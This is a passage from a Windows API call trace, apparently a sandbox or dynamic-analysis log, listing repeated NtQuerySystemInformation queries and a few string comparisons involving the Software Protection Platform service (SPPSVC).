SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x28, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x28, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0210.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x28, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.956] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x38, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x20, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x20, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.958] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0210.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd858, Length=0x50, ResultLength=0x0) [0210.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0210.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.961] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5b0, Length=0x28, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd620, Length=0x28, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0210.962] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0210.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0210.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x28, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0211.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd580, Length=0x20, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd600, Length=0x20, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x28, ResultLength=0x0) [0211.112] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0211.119] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0211.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb60, Length=0x28, ResultLength=0x0) [0211.279] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbe0, Length=0x50, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd940, Length=0x28, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x28, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd910, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb10, Length=0x38, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd920, Length=0x20, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd750, Length=0x50, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x50, ResultLength=0x0) [0211.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.291] 